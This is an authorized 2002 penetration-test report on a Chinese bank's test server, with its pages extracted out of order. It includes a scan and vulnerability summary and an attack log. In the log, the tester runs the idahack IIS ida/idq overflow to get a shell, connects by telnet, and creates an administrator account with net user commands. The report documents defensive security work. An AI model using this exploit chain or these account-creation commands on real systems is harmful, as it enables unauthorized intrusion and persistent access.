bank++渗透测试++某银行渗透测试报告
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
111.111.111.111 远程网络评估分析报告 安全评估结果示意图
检测漏洞数量结果分析
高风险:8 中风险:22 低风险:7
测试结果情况
25 20 15 10 5 0 高风险 高风险 中风险 中风险 低风险 低风险
风险值分布情况
第 9 页 共 29 页
****银行渗透测试综合服务报告书
发现安全隐患
0
445: MICROSOFT-DS - Microsoft-DS
发现安全隐患
0
1025: LISTEN – listen
发现安全隐患
1027: NT
0
发现安全隐患
0
1031: IAD2 - BBN IAD
发现安全隐患
0
1032: IAD3 - BBN IAD
发现安全隐患
0
第 11 页 共 29 页
****银行渗透测试综合服务报告书
文档编号:Isfocus—sql---20021006
****银行渗透测试综合服务 报告书
高度保密文件 不得复制
保密申明
这份文件包含了来自 安全服务部门的可靠、 权威的信息, 这些信息是作为**** 银行评估可能实施的安全解决方案专用,接受这份建议书表示同意对其内容保密并且未 经 安全服务部门书面请求和书面认可,不得复制,泄露或散布这份文件。如 果你不是有意接受者,请注意对这份建议书内容的任何形式的泄露、复制或散布都是被 禁止的。
服务回显 协议内容
220 gxmb Microsoft ESMTP MAIL Service, 版本: 5.0.2195.2966 ready at Mon, 23 Sep 2002 10:14:52 +0800 SMTP
第 10 页 共 29 页
****银行渗透测试综合服务报告书
net localgroup administrators sql /add 命令成功完成。 Exit d:\ 成功在对方服务器上建立一个新的用户 SQL,并把此用户添加到服务器的管理员列表,然 后通过图形管理界面远程进入服务器, 复制出此次渗透测试的目标文件。 远程渗透结束后第 一时间通知客户,立即将进行渗透测试的服务器断开网络连接。
发现安全隐患
19: CHARGEN – Character Generator
服务回显
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUV WXYZ[\]^_`abcdefg
发现安全隐患 1
25: SMTP - Simple Mail Transfer 协议内容
ECHO 1
9: DISCARD – Discard
发现安全隐患
0
13: DAYTIME – Daytime
服务回显 发现安全隐患
10:14:52 2002-9-23 0
17: QOTD - Quote of the Day
服务回显
"We want a few mad people now. See where the sane ones have landed us!" George Bernard Shaw (1856-1950) 0
135: RPC-LOCATOR - RPC (Remote Procedure Call) Location Service
发现安全隐患
0
139: NETBIOS-SSN - NETBIOS Session Service
服务回显 发现安全隐患
?/TD> 0
443: HTTPS - HTTPS (Hyper Text Transfer 协议内容 Secure) - SSL (Secure Socket Layer)
111.111.111.111 主机系统扫描纪录
主机基本信息
主机地址: 操作系统: 机器名字: 用途: 补丁情况:
111.111.111.111
Windows 2000 server GXMB
评估测试专用服务器 Service Pack 2
主机开放的端口和服务
7: ECHO – Echo
协议内容 发现安全隐患
111.111.111.111)
渗透测试时间和方式
类 型 地 址 地 点 时 间 攻击软件和 攻击方式 扫描和远程 溢出攻击工 具 人工入侵 测试 人员安排 SQL
WINDOW 2000 系统
111.111.111.111 ****银行
9 月 23 日下 午
第 4 页 共 29 页
****银行渗透测试综合服务报告书
安全服务部 二零零二年十月
第 1 页 共 29 页
****银行渗透测试综合服务报告书
拟 审 批 会
制: SQL 核: 准: 签
标准化: SQL
第 2 页 共 29 页
****银行渗透测试综合服务报告书
版本控制
版本号 1.0.0.0 日期 2002-10-6 参与人员 SQL 更新说明 建立文档,初始化
操作系统情况
UNIX 其他
NT/Win2000 UNIX 其他
NT/Win2000
网络扫描中出现最多的高风险漏洞
漏洞名称 允许 IPC 空连接 Decode 解码 Ida,idq 远程溢出 漏洞 风险程度 高 高 高 次数 1 1 1 修补方法 从注册表中禁止 IPC 空连接 厂商已经发布补丁,请升级该系统 补丁 厂商已经发布补丁,请升级该系统 补丁 受影响的 操作系统 NT/2000 NT/2000 NT/2000
渗透测试中利用最多的高风险漏洞
漏洞名称 Decode 漏洞 Ida/Idq 远程溢出 风险程度 高 高 次数 1 1 修补方法 厂商已经发布补丁,请升级该系统 补丁 厂商已经发布补丁,请升级该系统 补丁 受影响的 操作系统 NT/2000 NT/2000
网络扫描及渗透测试结果分析表
IP 地址 111.111.111.111 已渗透 是 9 存在的严重漏洞 Ida,idq 远程溢出漏洞
第 7 页 共 29 页
突破的方法 Ida/Idq 远程溢出
****银行渗透测试综合服务报告书
攻击步骤具体记录 111.111.111.111
经过扫描发现该主机 111.111.111.111 存在 ida/idq 远程溢出漏洞, 使用 idahack 直接获取了该系统的超级管理员权限. 详细情况如下:
分发控制
编号 1 2 读者 SQL **** 银 行 网络部门 人员 文档权限 编写,修改 读取 文档的作者 文档的读者 与文档的主要关系
第 3 页 共 29 页
****银行渗透测试综合服务报告书
渗透测试项目目标
在****银行安全项目规划阶段, 为了充分了解****银行专用网络信息系统的 当前安全状况(安全隐患) ,因此计划对****银行的信息专用网络系统中的专用 测试服务器进行一次远程安全评估之后再实施一次模拟渗透测试攻击, 获取指定 服务器上的指定文件表明攻击成功。 测试对象为****银行信息计算中心指定的服 务器。然后根据安全弱点扫描分析报告,作为提高****银行信息专用网络系统整 体安全的重要的参考依据之一。
客户主机的实际安全需求和组成情况
网络实际应用:
111.111.111.111 为客户****银行网络部门专门为这次评估准备安装的
一台虚拟真实业务服务器,系统采取默认安装状态补丁打到 SP2,主机 没有运行任何实际业务服务。
评估主机台数: 主机系统情况: 服 务 需 求:
d:\>telnet 111.111.111.111 23 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-1998 Microsoft Corp. C:\WINNT\system32>net user net user \\ 的用户帐户 ---------------------------------------------Administrator Guest IUSR_GXMB IWAM_GXMB TsInternetUser 命令运行完毕,但发生一个或多个错误。
1 台评估专用服务器 WINDOW 2000 SERVER SP2 服务处于默认安装运行状态
实际 IP 地址分配: 111.111.111.111
安全评估策略步骤的制定
主要步骤: 1 首先针对系统主机进行的安全匿名评估分为 2 个步骤进行。第一步利用现有的优秀安全 评估软件来模拟攻击行为进行自动的探测安全隐患;第二步根据第一步得出的扫描结果 进行分析由评估小组的工程师亲自在远程对服务器进行手动检测,排除误报情况,查找 扫描软件无法找到的安全漏洞即消除漏报情况。 第一步我们采用两种安全评估软件俄罗斯的 SSS 和 SYMANTEC 风险评估工具 NetRecon 在网络中的一个接入点进行匿名的安全扫描,采用两种扫描软件主要是为了防止单一软 件的不确定性和由于误报漏报所影响最终报告的正确性。 根据第一步所得出的报告由工程师手动从远程登陆服务器进行人工渗透测试和模拟攻 击。 进入服务器获取客户指定获取文件,表明攻击步骤完成。 根据扫描和攻击软件程序和手工攻击测试的结果写出这次渗透测试的报告书真实反映服 务器的安全状况。
发现安全隐患
0
53: DOMAIN - Domain Name Server
发现安全隐患
0
80: WWW-HTTP – World Wide Web HTTP (Hyper Text Transfer 协议内容)
协议内容 版本 Server Allow 发现安全隐患
HTTP HTTP/1.1 Microsoft-IIS/5.0 OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK 2
渗透测试目标系统主机范围
渗透测试的范围限制于经过客户以书面形式进行授权的主机、网络系统, 使用的手段也经过客户的书面同意。承诺不会对授权范围之外的网 络主机设备和数据进行测试、模拟攻击。 经 安全服务部门渗透测试小组和****银行信息计算中心的双方 确认,对如下的被选定的系统进行安全渗透测试: ¾ 采用 WINDOWS 2000 Server 版本系统的 Web 服务器 (IP 地址:
测试结果情况
获得一般权 限 未攻破
获得管理员权限 获得一般权限 未攻破
获得管理员 权限
测试结果操作系统分析
总共攻破的 IP 数:1 NT/Win2000 系统 IP 数:1 UNIX 系统 IP 数:0 其他 IP 数:0
第 6 页 共 29 页
****银行渗透测试综合服务报告书
2
3 4 5
客户意见: 同意实施方案,但需要注意不要对服务器及周边进行破坏性质的评估手段。
渗透测试结果示意图
测试结果数量分析
测试 IP 总数:1 台
第 5 页 共 29 页
****银行渗透测试综合服务报告书
成功获得管理员权限 IP 数:1 台 获取一般权限的 IP 数:0 未攻破的 IP 数:0
C:\WINNT\system32>net user sql 0okm9ijn net user sql 0okm9ijn 命令成功完成。
C:\WINNT\system32>net localgroup administrators sql /add
第 8 页 共 29 页
****银行渗透测试综合服务报告书
****银行渗透测试综合服务报告书
d:\>idahack 111.111.111.111 80 3 23 index server overflow. writen by sunx for test only, dont used to hack, :p
connecting... sending... checking... Now you can telnet to 23 port good luck :)